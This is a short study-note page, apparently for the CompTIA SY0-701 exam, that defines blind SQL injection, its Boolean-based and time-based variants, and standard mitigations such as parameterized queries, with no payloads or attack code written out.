Blind SQL injection

ELI5: What is Blind SQL Injection?

It’s like playing 20 questions with a locked diary — you can’t read it directly, but by asking yes-or-no questions, you can slowly figure out what’s written inside.

Definition

Blind SQL injection is a form of SQL injection in which the application does not return database error messages or query results directly to the attacker. Instead, the attacker infers information by observing how the application behaves differently based on true or false queries (Boolean-based blind SQLi) or by measuring response time delays triggered by conditional SQL statements (Time-based blind SQLi).

Key Details

Boolean-based blind SQLi: Attacker sends queries that change the page response (e.g., returns different content or length) based on true/false conditions.
Time-based blind SQLi: Uses database functions like SLEEP() (MySQL) or WAITFOR DELAY (SQL Server) to infer data bit by bit via response timing.
Much slower than error-based SQLi but equally dangerous—automated tools (sqlmap) can extract entire databases.
Mitigation: parameterized queries, stored procedures, input validation, WAF.
The blind nature makes it harder to detect in logs but still leaves SQL-like patterns in request parameters.

Connections

Parent: injection-attacks — a variant of SQL injection
See also: sql-injection-sqli, parameterized-queries-prepared-statements

SY0-701 Study Notes

Explorer

Blind SQL injection

Definition

Key Details

Connections

Graph View

Table of Contents

Backlinks